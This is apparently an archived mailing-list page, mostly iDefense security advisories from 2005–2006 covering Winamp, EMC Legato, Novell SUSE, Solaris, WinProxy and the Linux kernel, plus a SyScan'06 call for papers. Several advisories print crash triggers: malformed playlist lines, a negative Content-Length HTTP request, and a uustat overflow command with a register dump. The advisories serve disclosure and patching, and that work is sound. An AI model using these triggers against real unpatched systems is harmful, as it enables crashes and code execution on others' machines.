-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://www.infoworld.com/article/06/01/27/74869_HNoraclefiresback_1.html [EMAIL PROTECTED] wrote: > just a note that this rewrite rule causes things in htmldb not to > work anymore... > > > -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ+FAP6+LRXunxpxfAQKOvBAAnS6b08sTCWVejnaO39wbX/JkIVYphilt CP7/CRO0DdTPWXp1jKkbKb+ILP/9zG0IbMtCVAa/73Us5DGuT7AgRp8aIlYk70Fo idIpFYKBjYEuSyHFvLvmK025uo1B/b8XXS7sdFPtb8K1uiAuFxo6mOFvuPJLzC9X /WPn4WOP+N1QTjIJT5WK3uRKBhlMoXE46oD1aGyfMecN9GZiwYQkVClDsUUGr+8y Z9j7f3AvMyVf70S4IqyRbuhxbwMWmCYvWayfa7hHwhKlaH6nCzMNk71fTtVxMo0k HoisRn8HK6WIaGH2rv/MorYh/NWqMtKCV9HFk8TibtLtgg+yEHQmGh9qBmf7eEaK lk/5h37orRkIg2a9qclDfzHp87o00NCFtWGm+nFmoi+P613YVaAlSUEDhWJkkzOV 4u+AE2roCUzGyvVOY1RUPHv8uBpUKBg2gArr7XVT3J9HG3wZCU2qBHeqNDwHayCc T2lf0Myw51jzyv6HCiq/2kbxTOnfcwJ+a+MDgzC3y9jJKH4Q3DOILbNN3oXG+0YS QOghAVfixeGHeHw9loC2KcMzFOoJVt3c/MSJoolu7fVF/KMFT08Tw3jvbBJX3O56 c/IRanyA+ti7hl4LWm8sgTOVGd/nx8vSASdRi/vI7IqmLkebmrTjJwgdEEWvXShh A3g41uHkecw= =1Biz -END PGP SIGNATURE-
iDefense Security Advisory 02.01.06: Winamp m3u Parsing Stack Overflow Vulnerability
Winamp m3u Parsing Stack Overflow Vulnerability iDefense Security Advisory 02.01.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=377 February 1, 2006 I. BACKGROUND Winamp is a popular media player for Windows which supports many audio/video file formats. More information can be obtained from the vendors site at: http://winamp.com/player/ II. DESCRIPTION It has been found that a specially crafted m3u or pls file can overwrite a stack based buffer allowing for remote code execution. Example m3U file format: #EXTM3U #EXTINF:,VULN [...]AA Example pls file to trigger exploit: [playlist] numberofentries=1 File1=\\01 01AAA[...]AAA This vulnerability is specific to the 5.11 version of Winamp and does not affect previous versions. III. ANALYSIS When Winamp is installed it registers the m3u extension so that such files will automatically open in Winamp. This exploit can be triggered by clicking on a link in a webpage, or from the use of malicious javascript. Exploitation is straight forward, using a long full path. This path can be either a filename or the UNC name for a fileshare, which does not have to exist. Public exploit code has been independently released for this vulnerability (http://www.spyinstructors.com). IV. DETECTION This exploit was tested with version 5.11 of Winamp. Previous versions were tested and found to not be exploitable. V. WORKAROUND Removing the file associations for the m3u and pls file extension may mitigate the risk of exploitation. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this vulnerability. The vulnerability appears to have been silently fixed in Winamp 5.13 which is available for download at: http://www.winamp.com/player/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-0476 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/15/2005 Initial vendor notification 02/01/2006 Public disclosure IX. CREDIT This vulnerability was independently discovered by Alan Mccaig (b0f) [EMAIL PROTECTED] and Ruben Santamarta ([EMAIL PROTECTED]). Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.01.06: Winamp m3u/pls .WMA Extension Buffer Overflow Vulnerability
Winamp m3u/pls .WMA Extension Buffer Overflow Vulnerability iDefense Security Advisory 02.01.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=378 February 1, 2006 I. BACKGROUND Winamp is a popular media player for Windows which supports many audio/video file formats. More information can be obtained from the vendors site at: http://winamp.com/player/ II. DESCRIPTION It has been found that a specially crafted m3u or pls file with a target filename having the .wma extension can crash Winamp giving the attacker control over the EAX register. Example m3U file format: #EXTM3U #EXTINF:,VULN [...]AA.wma Example pls file format: [playlist] numberofentries=5 File1=[...]AA.wma Title1= Length5=-1 Version=2 III. ANALYSIS When Winamp is installed it registers the m3u and pls extensions so that such files will automatically open in Winamp. This exploit can be triggered by clicking on a link in a web page, or through the use of malicious javascript. The crash occurs in the Winamp module with the following instructions: mov edx, [eax] call [edx+24] The number of characters that can be inject is limited. With control of the EAX register injected into the above code, meaningful shellcode execution is possible. IV. DETECTION This vulnerability has been verified in version 5.094 of Winamp. V. WORKAROUND Removing the file mapping for m3u and pls files to Winamp should mitigate the risk of exploitation. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this vulnerability. The vulnerability appears to have been silently fixed in Winamp 5.11. Version 5.13 is now available for download at: http://www.winamp.com/player/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3188 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/12/2005 Initial vendor notification 02/01/2006 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by b0f. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.23.06: Computer Associates iTechnology iGateway Service Content-Length Buffer Overflow Vulnerability
lectronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Call For Paper - SyScan'06 Singapore
*CALL FOR PAPER ABOUT SYSCAN’06* The Symposium on Security for Asia Network aims to be a very different security conference from the rest of the security conferences that the information security community in Asia has come to be so familiar and frustrated with. SyScan’06 intends to be a non-product, non-vendor biased security conference. It is the aspiration of SyScan’06 to congregate, in Singapore, the best security experts in their various fields, to share their research, discovery and experience with all security enthusiasts in Asia. The speakers that will be at SyScan’06 are among the best, and brightest. These experienced security professionals at the vanguard of leading information security technology have assembled unique new material that they will present at this conference to help you maintain your technological leadership and stay abreast of the latest developments in this rapidly moving technological field. This two-day symposium will be held in a relaxed and informal atmosphere, allowing all participants to enjoy themselves whilst expanding their knowledge on information security. SyScan’06 will be held in Singapore in the month of July, 2006. Besides main the conference, there will also be specialized security training courses in SyScan’06. These classes will be held before the main conference. ***Speakers/trainers privileges* Speakers at SyScan’06 will enjoy the following privileges. *Generic Privileges* * Return economy class air-ticket for one person. * Hotel accommodation. * Breakfast, lunch and dinner during conference. * After-conference party. * A healthy dose of alcohol. *Special Privileges* * *One selected speaker from each category will receive US$1,000 honorarium in cash. Selection will be based on the following criteria: o New presentation not seen in any other conferences before. * **Presentations that reveal unpublished/undisclosed vulnerabilities/exploits/techniques/malware will receive US$2,000 honorarium in cash. Selection will be based on the following criterion: o Critical zero-day vulnerability, or o Working exploits (can be reproduce and must have POC), or o New techniques for: + Discovery of vulnerability, or + Exploiting existing vulnerability o New form of malware. *CFP SUBMISSION* CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously. 2) Proposed presentation title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational experience/background. 6) Why is your material different or innovative or significant or an important tutorial? All submission must be in English in either MS Office or OpenOffice or PDF format. The more information you provide, the better the chance for selection. Please send submission to [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>. Submission must be done no later than 30^th April 2006. *Important Dates* Final CFP Submission – 30^th April 2006 Notification of Acceptance or Rejection – 15^th May 2006 Final Accepted Presentation Material Submission – 30^th June 2006 * * *Topics* The following categories are the focus for SyScan’06: 64-bit Vista Mobile Devices Malware VoIP Linux The scopes of the focus are broad and include, but not restricted to the following areas: *64-bit **Vista*** * Vulnerabilities o Kernel o Protocols * Exploits o Kernel o Protocols o Shellcodes * Malware o Virus o Rootkit o Spyware *Mobile Devices (embedded systems)* · Vulnerabilities o Operating Systems o Applications * Exploits o Operating Systems o Applications * Malware o Virus *Malware* * Rootkits * Spyware *VoIP* * Vulnerabilities * Exploits *Linux* *BotNets* *Others* Any topics that will catch the attention of the CFP committee and/or the world. * * *OTHER INFORMATION* Please feel free to visit SyScan’06 <http://www.syscan.org/> website to get a feel what this conference is all about – SHARE AND HAVE FUN! Also lookout here for the latest update on /SyScAN’05/. *It is possible and not necessary that every category will have a speaker that will receive the US$1000 honorarium. The CFP committee of SyScan’06 will be the final arbitrator on this matter. **If your presentation meets the criterion for both categories of honorarium, you will receive only the higher honorarium of US$2,000 in cash. The CFP committee of SyScan’06 will be the final arbitrator on this matter. By agreeing to speak at the SyScan’06 you are granting SyScan
iDefense Security Advisory 01.17.06: Cisco Systems IOS 11 Web Service CDP Status Page Code Injection Vulnerability
tp://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.17.06: EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability
EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability iDefense Security Advisory 01.17.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=374 January 17, 2006 I. BACKGROUND EMC Legato NetWorker is a cross-platform backup and recovery application. II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in EMC Corp.'s Legato Networker allows attackers to execute arbitary code on windows platforms. The vulnerability specifically exists due to improper handling of malformed RPC requests to RPC program number 390113. When such a request is sent by an attacker, it is possible to overwrite portions of heap memory, thus leading to arbitrary code execution by way of a function pointer overwrite. If an attacker can populate memory so that his data is in a predictable location, arbitrary code execution is possible. It is possible to populate memory in several ways, including by utilizing memory leaks. III. ANALYSIS Successful exploitation allows a remote attacker to gain access to a targetted machine. As nsrd.exe is installed on backup client machines as well as server machines, an attacker may rapidly compromise a network using this vulnerability. IV. DETECTION iDefense has confirmed this vulnerability in Networker 7.2 build 172. All previous versions are suspected vulnerable. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE "Complete resolutions to the vulnerabilities are available today in NetWorker 7.1.4 and 7.3. EMC has created a hot-fix to protect against vulnerabilities for 7.2.1 customers. No fixes are planned for previous NetWorker releases." "These remedies are available for download at:" http://www.legato.com/support/websupport/product_alerts/011606_NW.htm VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-3658 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/17/2005 Initial vendor notification 11/17/2005 Initial vendor response 01/17/2006 Coordinated public disclosure IX. CREDIT Jo Goossens is credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.17.06: EMC Legato Networker nsrd.exe DoS Vulnerability
EMC Legato Networker nsrd.exe DoS Vulnerability iDefense Security Advisory 01.17.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=375 January 17, 2006 I. BACKGROUND EMC Legato NetWorker is a cross-platform backup and recovery application. II. DESCRIPTION Remote exploitation of a denial of service vulnerability in EMC Corp.'s Legato Networker allows attackers to crash the nsrd service. The vulnerability specifically exists due to improper handling of malformed RPC requests to RPC program number 390109. By sending such a request, an attacker is able to cause a NULL pointer to be used as the base in a memory reference, which leads to a crash of the service. The daemon will crash on a NULL pointer dereference as no exception handlers are invoked which might allow it to recover. III. ANALYSIS Successful exploitation allows a remote attacker to crash the nsrd.exe process. IV. DETECTION iDefense has confirmed this vulnerability in Networker 7.2 build 172. All previous versions are suspected vulnerable. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE "Complete resolutions to the vulnerabilities are available today in NetWorker 7.1.4 and 7.3. EMC has created a hot-fix to protect against vulnerabilities for 7.2.1 customers. No fixes are planned for previous NetWorker releases." "These remedies are available for download at:" http://www.legato.com/support/websupport/product_alerts/011606_NW.htm VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-3659 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/17/2005 Initial vendor notification 11/17/2005 Initial vendor response 01/17/2006 Coordinated public disclosure IX. CREDIT Jo Goossens is credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.13.06: Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow
Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow iDefense Security Advisory 01.13.06 http://www.idefense.com/application/poi/display?type=vulnerabilities January 13, 2006 I. BACKGROUND Novell SUSE Linux Enterprise Server is a platform for open source computing in an enterprise environment. II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Novell Inc.'s Open Enterprise Server Remote Manager allows attackers to execute arbitrary code. III. ANALYSIS The vulnerability specifically exists due to improper handling of a an HTTP POST request with a negative Content-Length paramater. When such a request is received, controllable heap corruption occurs which can lead to the execution of arbitrary code using traditional Linux heap overflow methods. The following HTTP request can be used to trigger this vulnerability. POST / HTTP/1.0 Content-Length: -900 DATA_THAT_WILL_BE_USED_TO_OVERWRITE_THE_HEAP iDefense Labs testing has determined that with careful manipulation of the string, an arbitrary 4 byte write may be achieved which can be used to gain execution control. IV. DETECTION iDefense has confirmed this vulnerability in Novell SUSE Linux Enterprise Server 9. All previous versions are suspected vulnerable. Novell SUSE Linux Enterprise Server components are included in Novell Open Enterprise Server; as such, Open Enterprise Server is also vulnerable. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE Novell has released the following advisories to address this issue: http://portal.suse.com/psdb/1af470a99a736eb966cc0e52fb71ee98.html http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/1af470a99a736eb966cc0e52fb71ee98.html SUSE has released the following advisories to address this issue: http://www.novell.com/linux/security/advisories/2006_02_novellnrm.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3655 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/15/2005 Initial vendor notification 11/15/2005 Initial vendor response 01/13/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.10.06: Sun Solaris uustat Buffer Overflow Vulnerability
Sun Solaris uustat Buffer Overflow Vulnerability iDefense Security Advisory 01.10.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=366 January 10, 2006 I. BACKGROUND The uustat binary (part of the uucp project) is used to display or cancel uucp requests as well as to provide general status on uucp connections to other systems. II. DESCRIPTION There exists a buffer overflow venerability in the /usr/bin/uustat binary in Sun Solaris 5.8 and 5.9. The uustat binary is installed setuid "uucp" by default on Solaris. The "-S" command line argument causes the binary to crash when followed with a string that is greater than or equal to 1152 bytes in length. The following shows the buffer being overflowed and then the o1 register being completely overwritten with the letter 'A': bash-2.03% ls -l /usr/bin/uustat ---s--x--x 1 uucp uucp62012 Jan 17 16:07 uustat bash-2.03$ /usr/bin/uustat -S `perl -e 'print "A"x3000'` Segmentation Fault bash-2.03$ (gdb) info registers g0 0x0 0 g1 0xff315e98 -13541736 g2 0x1cc00 117760 g3 0x4401088 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xff3276a8 -13470040 o1 0x41414141 1094795585 ... III. ANALYSIS By exploiting this buffer overflow, an attacker can potentially gain control of the return address of the executing function, allowing arbitrary code execution with "uucp" privileges. IV. DETECTION Solaris 8 and 9 are running on SPARC and x86 architectures are vulnerable. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE The vendor has released the following advisory to address this issue: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101933-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-0780 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/11/2004 Initial vendor contact 08/11/2004 Initial vendor response 01/10/2006 Coordinated public disclosure IX. CREDIT Angelo Rosiello (http://www.rosiello.org) is credited with discovering this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability
www.redhat.com/archives/fedora-announce-list/2006-January/msg00015.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3656 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/15/2005 Initial vendor notification 11/22/2005 Initial vendor response 01/09/2006 Coordinated public disclosure IX. CREDIT The discovery of this vulnerability is credited to Sparfell. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.05.06: Blue Coat WinProxy Telnet DoS Vulnerability
Blue Coat WinProxy Telnet DoS Vulnerability iDefense Security Advisory 01.05.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365 January 05, 2006 I. BACKGROUND BlueCoat WinProxy is an Internet sharing proxy server designed for small to medium businesses. In addition to Internet sharing Winproxy also hosts a series of security, anti-spam and anti-spyware capabilities. More information can be located from the vendors site at: http://www.winproxy.com/ II. DESCRIPTION Remote exploitation of a design error in Blue Coat Systems Inc.'s WinProxy allows attackers to cause a denial of service (DoS) condition. The vulnerability can be triggered by sending a large string of 0xFF characters to the telnet proxy port of the server. Sending such a string will cause a heap corruption in the Winproxy process causing it to crash. III. ANALYSIS Successful exploitation requires an attacker to send a stream of TCP packets containing the 0xFF character to the WinProxy telnet server on TCP port 23. This will lead to a crash of the server and it will be unusable until it is restarted. In lab tests, the heap corruption caused by this exploit led to cashes in random locations in the process. The possibility for remote code execution is possible, however will likely be very hard to control and maintain reliable code execution. IV. DETECTION iDefense has confirmed this vulnerability in WinProxy 6.0. All previous versions are suspected to be vulnerable. V. WORKAROUND Disabling the WinProxy telnet protocol will prevent this attack. VI. VENDOR RESPONSE Blue Coat has released WinProxy 6.1a to address this vulnerability. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-3654 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/15/2005 Initial vendor notification 11/15/2005 Initial vendor response 01/05/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.05.06: Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability
Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability iDefense Security Advisory 01.05.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364 January 05, 2006 I. BACKGROUND BlueCoat WinProxy is an Internet sharing proxy server designed for small to medium businesses. In addition to Internet sharing Winproxy also hosts a series of security, anti-spam and anti-spyware capabilities. More information can be located from the vendors site at: http://www.winproxy.com/ II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in Blue Coat Systems Inc.'s WinProxy allows for the remote execution of arbitrary code by attackers. The vulnerability can be triggered by sending an overly long Host: string to the web proxy service. III. ANALYSIS Exploitation of this vulnerability is trivial. An overly long header directly overwrites the SEH handler for the frame allowing for control over EIP. IV. DETECTION iDefense has confirmed this vulnerability in WinProxy 6.0. All previous versions are suspected to be vulnerable. V. WORKAROUND Disabling the WinProxy web proxy protocol will prevent this attack. VI. VENDOR RESPONSE Blue Coat has released WinProxy 6.1a to address this vulnerability. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-4085 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/07/2005 Initial vendor notification 12/08/2005 Initial vendor response 01/05/2006 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by FistFuXXer. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 01.05.06: Blue Coat WinProxy Remote DoS Vulnerability
Blue Coat WinProxy Remote DoS Vulnerability iDefense Security Advisory 01.05.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363 January 05, 2006 I. BACKGROUND BlueCoat WinProxy is an Internet sharing proxy server designed for small to medium businesses. In addition to Internet sharing Winproxy also hosts a series of security, anti-spam and anti-spyware capabilities. More information can be located from the vendors site at: http://www.winproxy.com/ II. DESCRIPTION Remote exploitation of a design error in Blue Coat Systems Inc.'s WinProxy allows attackers to cause a denial of service (DoS) condition. The vulnerability specifically exists due to improper handling of a long HTTP request that is approximately 32,768 bytes long. When such a request occurs, the process will crash while attempting to read past the end of a memory region. III. ANALYSIS Successful exploitation requires an attacker to send a specially constructed HTTP request to the WinProxy server on TCP port 80. This will lead to a crash of the server and it will be unusable until it is restarted. This vulnerability may only be utilized by attackers who have access to the network segment that contains the listening daemon, which in some cases is a private local area network. IV. DETECTION iDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has reported that previous versions are not affected. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE Blue Coat has released WinProxy 6.1a to address this vulnerability. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-3187 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/12/2005 Initial vendor notification 10/12/2005 Initial vendor response 01/05/2006 Coordinated public disclosure IX. CREDIT FistFuXXer is credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability
Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability
iDefense Security Advisory 12.22.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=362
December 22, 2005
I. BACKGROUND
Linux is a clone of the operating system Unix, written from scratch by
Linus Torvalds with assistance from a loosely-knit team of hackers
across the Net. It aims towards POSIX and Single UNIX Specification
compliance.
More information is available from the vendor website:
http://www.kernel.org
II. DESCRIPTION
Local exploitation of a memory exhaustion vulnerability in Linux Kernel
versions 2.4 and 2.6 can allow attackers to cause a denial of service
condition.
The vulnerability specifically exists due to a lack of resource checking
during the buffering of data for transfer over a pair of sockets. An
attacker can create a situation that, depending on the amount of
available system resources, can cause the kernel to panic due to memory
resource exhaustion. The attack is conducted by opening up a number of
connected file descriptors or socketpairs and creating the largest
possible kernel buffer for the data transfer between the two sockets. By
causing the process to enter a zombie state or closing the file
descriptor while keeping a reference open, the data is kept in the
kernel until the transfer can complete. If done repeatedly, system
memory resources can be exhausted from the kernel.
III. ANALYSIS
Successful exploitation requires an attacker to have local access to an
affected Linux system and can result in complete system denial of
service. The system may not reboot after successful exploitation,
requiring human interaction to be restored to a working state. Depending
on available resources, systems with large amounts of physical memory
may not be affected.
IV. DETECTION
iDefense has confirmed that Linux 2.4.22 and Linux 2.6.12 are
vulnerable.
V. WORKAROUND
An effective workaround is not available for this vulnerability.
VI. VENDOR RESPONSE
The maintainer acknowledges that this issue is a design limitation in
the Linux kernel. The following advice has been offered for creating a
patch. It should be noted that this patch has not been fully tested.
The patch requires three steps:
1) Add a "struct user *" reference to the "struct file" file structure.
2) Whenever creating a new "struct file" add the following code:
struct user *user = current->user;
if (atomic_read(&user->files) > MAX_FILES_FOR_THIS_USER)
return -EMFILE;
file->user = user;
if(user) {
atomic_inc(&user->count);
atomic_inc(&user->files);
}
3) Whenever a "struct file" is released apply the following code:
struct user *user = file->user;
if (user) {
atomic_dec(&user->files);
free_uid(user);
}
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
